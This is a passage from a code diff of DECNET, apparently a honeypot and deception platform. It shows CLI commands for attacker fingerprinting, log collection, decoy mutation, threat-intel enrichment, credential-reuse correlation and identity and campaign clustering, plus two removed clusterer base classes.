    log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", "-f", help="Path for RFC 5424 syslog + .json output (reads attackers from .json, writes results to both)"),
    interval: int = typer.Option(300, "--interval", "-i", help="Seconds between probe cycles (default: 300)"),
    timeout: float = typer.Option(5.0, "--timeout", help="Per-probe TCP timeout in seconds"),
    daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background (used by deploy, no console output)"),
) -> None:
    """Fingerprint attackers (JARM + HASSH + TCP/IP stack) discovered in the log stream."""
    import asyncio
    from decnet.prober import prober_worker

    def _run_worker() -> None:
        asyncio.run(prober_worker(log_file, interval=interval, timeout=timeout))

    if not daemon:
        # Foreground: announce on the console and make Ctrl+C a clean exit.
        log.info("probe command invoked log_file=%s interval=%d", log_file, interval)
        console.print(f"[bold cyan]DECNET-PROBER[/] watching {log_file} for attackers (interval: {interval}s)")
        console.print("[dim]Press Ctrl+C to stop[/]")
        try:
            _run_worker()
        except KeyboardInterrupt:
            console.print("\n[yellow]DECNET-PROBER stopped.[/]")
        return

    # Background: detach first, then run the worker with no console output.
    log.info("probe daemonizing log_file=%s interval=%d", log_file, interval)
    _utils._daemonize()
    _run_worker()
|
||||
|
||||
@app.command()
def collect(
    log_file: str = typer.Option(DECNET_INGEST_LOG_FILE, "--log-file", "-f", help="Path to write RFC 5424 syslog lines and .json records"),
    daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
) -> None:
    """Stream Docker logs from all running decky service containers to a log file."""
    import asyncio
    from decnet.collector import log_collector_worker

    # Detach first when asked to; everything below runs in either mode.
    if daemon:
        log.info("collect daemonizing log_file=%s", log_file)
        _utils._daemonize()

    log.info("collect command invoked log_file=%s", log_file)
    console.print(f"[bold cyan]Collector starting[/] → {log_file}")

    worker = log_collector_worker(log_file)
    asyncio.run(worker)
|
||||
|
||||
@app.command()
def mutate(
    watch: bool = typer.Option(False, "--watch", "-w", help="Run continuously and mutate deckies according to their interval"),
    decky_name: Optional[str] = typer.Option(None, "--decky", help="Force mutate a specific decky immediately"),
    force_all: bool = typer.Option(False, "--all", help="Force mutate all deckies immediately"),
    daemon: bool = typer.Option(False, "--daemon", "-d", help="Detach to background as a daemon process"),
) -> None:
    """Manually trigger or continuously watch for decky mutation."""
    import asyncio
    from decnet.mutator import mutate_decky, mutate_all, run_watch_loop
    from decnet.web.dependencies import repo

    if daemon:
        log.info("mutate daemonizing watch=%s", watch)
        _utils._daemonize()

    async def _dispatch() -> None:
        await repo.initialize()
        # Precedence: --watch, then --decky, then a pass over every decky
        # (forced only when --all was given).
        if watch:
            await run_watch_loop(repo)
            return
        if decky_name:
            await mutate_decky(decky_name, repo)
            return
        await mutate_all(force=force_all, repo=repo)

    asyncio.run(_dispatch())
|
||||
|
||||
@app.command(name="enrich")
def enrich(
    poll_interval_secs: float = typer.Option(
        60.0, "--poll-interval", "-i",
        help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
    ),
    ttl_hours: int = typer.Option(
        24, "--ttl-hours",
        help="Cache lifetime per attacker IP — re-firings inside the window short-circuit before any HTTP egress",
    ),
    daemon: bool = typer.Option(
        False, "--daemon", "-d",
        help="Detach to background as a daemon process",
    ),
) -> None:
    """Threat-intel enrichment worker — fan out per attacker IP across
    configured providers (GreyNoise, AbuseIPDB, abuse.ch Feodo Tracker
    + ThreatFox), cache the verdict in ``attacker_intel``, and publish
    ``attacker.intel.enriched`` for SIEM-bound webhook consumers.
    """
    import asyncio
    from decnet.intel.worker import run_intel_loop
    from decnet.web.dependencies import repo

    if daemon:
        log.info(
            "enrich daemonizing poll=%s ttl_hours=%d",
            poll_interval_secs, ttl_hours,
        )
        _utils._daemonize()

    log.info(
        "enrich command invoked poll=%s ttl_hours=%d",
        poll_interval_secs, ttl_hours,
    )
    banner = (
        f"[bold cyan]Intel enrichment starting[/] "
        f"poll={poll_interval_secs}s ttl={ttl_hours}h"
    )
    console.print(banner)
    console.print("[dim]Press Ctrl+C to stop[/]")

    async def _serve() -> None:
        # The repository is initialised before the loop is entered.
        await repo.initialize()
        await run_intel_loop(
            repo,
            poll_interval_secs=poll_interval_secs,
            ttl_hours=ttl_hours,
        )

    try:
        asyncio.run(_serve())
    except KeyboardInterrupt:
        console.print("\n[yellow]Intel enrichment stopped.[/]")
|
||||
|
||||
@app.command(name="reuse-correlate")
def reuse_correlate(
    min_targets: int = typer.Option(
        2, "--min-targets", "-m",
        help="Minimum distinct (decky, service) targets a secret must hit before a CredentialReuse row is persisted",
    ),
    poll_interval_secs: float = typer.Option(
        60.0, "--poll-interval", "-i",
        help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
    ),
    daemon: bool = typer.Option(
        False, "--daemon", "-d",
        help="Detach to background as a daemon process",
    ),
) -> None:
    """Long-running credential-reuse correlator.

    Watches the bus for ``credential.captured`` and ``attacker.observed``
    events, re-runs the reuse pass on each wake, and publishes
    ``credential.reuse.detected`` for every new or grown
    ``CredentialReuse`` row.
    """
    import asyncio
    from decnet.correlation.reuse_worker import run_reuse_loop
    from decnet.web.dependencies import repo

    if daemon:
        log.info(
            "reuse-correlate daemonizing min_targets=%d poll=%s",
            min_targets, poll_interval_secs,
        )
        _utils._daemonize()

    log.info(
        "reuse-correlate command invoked min_targets=%d poll=%s",
        min_targets, poll_interval_secs,
    )
    banner = (
        f"[bold cyan]Reuse correlator starting[/] "
        f"min_targets={min_targets} poll={poll_interval_secs}s"
    )
    console.print(banner)
    console.print("[dim]Press Ctrl+C to stop[/]")

    async def _serve() -> None:
        # The repository is initialised before the loop is entered.
        await repo.initialize()
        await run_reuse_loop(
            repo,
            poll_interval_secs=poll_interval_secs,
            min_targets=min_targets,
        )

    try:
        asyncio.run(_serve())
    except KeyboardInterrupt:
        console.print("\n[yellow]Reuse correlator stopped.[/]")
|
||||
|
||||
@app.command(name="clusterer")
def clusterer(
    poll_interval_secs: float = typer.Option(
        60.0, "--poll-interval", "-i",
        help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
    ),
    daemon: bool = typer.Option(
        False, "--daemon", "-d",
        help="Detach to background as a daemon process",
    ),
) -> None:
    """Identity-resolution clusterer.

    Bus-woken on ``attacker.observed`` and ``attacker.scored``;
    builds a similarity graph over observations, runs
    connected-components, writes ``attacker_identities`` rows, and
    publishes ``identity.formed`` / ``identity.observation.linked``
    / ``identity.merged`` / ``identity.unmerged``.
    """
    import asyncio
    from decnet.cli.gating import _require_master_mode
    from decnet.clustering.worker import run_clusterer_loop
    from decnet.web.dependencies import repo

    # The master-mode gate runs before anything is started or detached.
    _require_master_mode("clusterer")

    if daemon:
        log.info("clusterer daemonizing poll=%s", poll_interval_secs)
        _utils._daemonize()

    log.info("clusterer command invoked poll=%s", poll_interval_secs)
    banner = (
        f"[bold cyan]Identity clusterer starting[/] "
        f"poll={poll_interval_secs}s"
    )
    console.print(banner)
    console.print("[dim]Press Ctrl+C to stop[/]")

    async def _serve() -> None:
        # The repository is initialised before the loop is entered.
        await repo.initialize()
        await run_clusterer_loop(
            repo, poll_interval_secs=poll_interval_secs,
        )

    try:
        asyncio.run(_serve())
    except KeyboardInterrupt:
        console.print("\n[yellow]Identity clusterer stopped.[/]")
|
||||
|
||||
@app.command(name="campaign-clusterer")
def campaign_clusterer(
    poll_interval_secs: float = typer.Option(
        60.0,
        "--poll-interval",
        "-i",
        help="Slow-tick fallback when the bus is idle or unavailable (seconds)",
    ),
    daemon: bool = typer.Option(
        False,
        "--daemon",
        "-d",
        help="Detach to background as a daemon process",
    ),
) -> None:
    """Campaign clusterer — groups identities into operations.

    Bus-woken on ``identity.>`` (any identity-layer change is
    potential input); reads ``AttackerIdentity`` rows, runs
    connected-components over the campaign-level similarity graph
    (phase-handoff / shared-infra / temporal-overlap / cohort),
    writes ``campaigns`` rows + sets ``attacker_identities.campaign_id``,
    and publishes ``campaign.formed`` / ``campaign.identity.assigned``
    / ``campaign.merged`` / ``campaign.unmerged`` plus the cross-family
    ``identity.campaign.assigned`` so identity-side subscribers see
    the badge update.
    """
    # Imports are kept function-local, in their original order.
    import asyncio

    from decnet.cli.gating import _require_master_mode
    from decnet.clustering.campaign.worker import run_campaign_clusterer_loop
    from decnet.web.dependencies import repo

    # The gate check runs before any daemonizing, logging of the
    # invocation, or console output.
    _require_master_mode("campaign-clusterer")

    if daemon:
        log.info("campaign-clusterer daemonizing poll=%s", poll_interval_secs)
        _utils._daemonize()

    log.info("campaign-clusterer command invoked poll=%s", poll_interval_secs)
    banner = f"[bold cyan]Campaign clusterer starting[/] poll={poll_interval_secs}s"
    console.print(banner)
    console.print("[dim]Press Ctrl+C to stop[/]")

    async def _serve() -> None:
        # The repository is initialized once, then handed to the worker loop.
        await repo.initialize()
        await run_campaign_clusterer_loop(
            repo,
            poll_interval_secs=poll_interval_secs,
        )

    try:
        asyncio.run(_serve())
    except KeyboardInterrupt:
        # Ctrl+C is reported as a normal stop rather than a traceback.
        console.print("\n[yellow]Campaign clusterer stopped.[/]")
|
||||
@@ -1 +0,0 @@
|
||||
"""Campaign clustering — see development/CAMPAIGN_CLUSTERING.md."""
|
||||
@@ -1,83 +0,0 @@
|
||||
"""Identity-resolution clusterer protocol.
|
||||
|
||||
Each concrete clusterer (``decnet.clustering.impl.connected_components``,
|
||||
and any future variant) implements this. Callers must obtain the active
|
||||
clusterer via :func:`decnet.clustering.factory.get_clusterer` — never
|
||||
instantiate a concrete class directly.
|
||||
|
||||
The clusterer mirrors the provider-subpackage convention used by
|
||||
:mod:`decnet.bus` and :mod:`decnet.web.db`: ``base.py`` defines the
|
||||
protocol, ``factory.py`` dispatches on ``DECNET_CLUSTERER_TYPE``, and
|
||||
``impl/`` holds concrete implementations.
|
||||
|
||||
Distinct from the ``tests/factories/campaign_factory.py`` namespace —
|
||||
that's the synthetic-data DSL used by the fixture suite. The clusterer
|
||||
here is the production worker that the fixture suite *gates*.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from abc import ABC, abstractmethod
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Any
|
||||
|
||||
from decnet.web.db.repository import BaseRepository
|
||||
|
||||
|
||||
@dataclass
class ClusterResult:
    """Summary of what one clusterer ``tick`` changed.

    The worker shell reads these lists to publish on the bus
    (``identity.formed`` / ``identity.observation.linked`` /
    ``identity.merged`` / ``identity.unmerged``). DB writes have already
    been committed by the clusterer before this object is returned, so a
    lost publish costs at most a few seconds of UI latency.

    Every field defaults to its own fresh, empty list.
    """

    #: One dict per newly created identity. Shape:
    #: ``{"identity_uuid": str, "observation_uuids": [str, ...]}``.
    identities_formed: list[dict[str, Any]] = field(default_factory=list)

    #: One dict per observation attached to an existing identity. Shape:
    #: ``{"identity_uuid": str, "observation_uuid": str}``.
    observations_linked: list[dict[str, Any]] = field(default_factory=list)

    #: One dict per merge. Shape:
    #: ``{"winner_uuid": str, "loser_uuid": str}``.
    identities_merged: list[dict[str, Any]] = field(default_factory=list)

    #: One dict per revoked merge (contradicting evidence re-split a
    #: previously-merged pair). Shape:
    #: ``{"resurrected_uuid": str, "former_winner_uuid": str}``.
    #:
    #: Reserved for the revocable-merge work; the skeleton clusterer never
    #: produces these. Subscribers on ``identity.>`` should still handle
    #: them from day one — see ``identity.unmerged`` in
    #: :mod:`decnet.bus.topics`.
    identities_unmerged: list[dict[str, Any]] = field(default_factory=list)
|
||||
|
||||
|
||||
class Clusterer(ABC):
    """Base class for identity-resolution clusterers.

    The contract is one coroutine, ``tick``. A tick reads pending
    observations from the repo, runs a clustering pass, commits
    ``attacker_identities`` rows + sets ``attackers.identity_id``, and
    hands back a :class:`ClusterResult` describing the side-effects so
    the worker shell can publish them.

    ``tick`` MUST NOT raise: one bad pass is not allowed to take the
    worker down. Implementations should log internal failures and
    return an empty :class:`ClusterResult` instead.
    """

    #: Short tag — surfaces in logs and in
    #: ``DECNET_CLUSTERER_TYPE`` for factory dispatch.
    name: str

    @abstractmethod
    async def tick(self, repo: BaseRepository) -> ClusterResult:
        """Perform one clustering pass; the class docstring has the contract."""
|
||||
|
||||
|
||||
__all__ = ["Clusterer", "ClusterResult"]
|
||||
@@ -1,5 +0,0 @@
|
||||
"""Campaign clusterer — groups resolved identities into operations.
|
||||
|
||||
The layer above identity resolution. See
|
||||
``development/CAMPAIGN_CLUSTERING.md`` for the signal taxonomy.
|
||||
"""
|
||||
@@ -1,66 +0,0 @@
|
||||
"""Campaign clusterer protocol — layer above identity resolution.
|
||||
|
||||
Mirrors :mod:`decnet.clustering.base` for the layer above. Each concrete
|
||||
campaign clusterer implements :class:`CampaignClusterer`; callers obtain
|
||||
the active instance via
|
||||
:func:`decnet.clustering.campaign.factory.get_campaign_clusterer`.
|
||||
|
||||
The result shape parallels :class:`ClusterResult` but speaks campaign
|
||||
vocabulary: campaigns formed, identities assigned, campaigns merged,
|
||||
campaigns unmerged.
|
||||
"""
|
||||
from __future__ import annotations
|
||||
|
||||
from abc import ABC, abstractmethod
|
||||
from dataclasses import dataclass, field
|
||||
from typing import Any
|
||||
|
||||
from decnet.web.db.repository import BaseRepository
|
||||
|
||||
|
||||
@dataclass
class CampaignClusterResult:
    """Summary of what one campaign-clusterer ``tick`` changed.

    The worker shell reads these lists to publish on the bus
    (``campaign.formed`` / ``campaign.identity.assigned`` /
    ``campaign.merged`` / ``campaign.unmerged`` plus the cross-family
    ``identity.campaign.assigned``). DB writes are already committed
    by the time this object is returned.

    Every field defaults to its own fresh, empty list.
    """

    #: ``{"campaign_uuid": str, "identity_uuids": [str, ...]}``.
    campaigns_formed: list[dict[str, Any]] = field(default_factory=list)

    #: ``{"campaign_uuid": str, "identity_uuid": str,
    #: "prior_campaign_uuid": Optional[str]}``.
    identities_assigned: list[dict[str, Any]] = field(default_factory=list)

    #: ``{"winner_uuid": str, "loser_uuid": str}``.
    campaigns_merged: list[dict[str, Any]] = field(default_factory=list)

    #: ``{"resurrected_uuid": str, "former_winner_uuid": str}``.
    campaigns_unmerged: list[dict[str, Any]] = field(default_factory=list)
|
||||
|
||||
|
||||
class CampaignClusterer(ABC):
    """Base class for campaign clusterers.

    Same single-method contract as :class:`Clusterer`. A ``tick`` reads
    identities from the repo, projects them to a campaign-level feature
    shape, runs a clustering pass, commits ``campaigns`` rows + sets
    ``attacker_identities.campaign_id``, and hands back a
    :class:`CampaignClusterResult` describing the side-effects.

    ``tick`` MUST NOT raise: one bad pass is not allowed to take the
    worker down.
    """

    name: str

    @abstractmethod
    async def tick(self, repo: BaseRepository) -> CampaignClusterResult:
        """Perform one campaign clustering pass."""
|
||||
|
||||
|
||||
__all__ = ["CampaignClusterer", "CampaignClusterResult"]
|
||||
Some files were not shown because too many files have changed in this diff Show More
Reference in New Issue
Block a user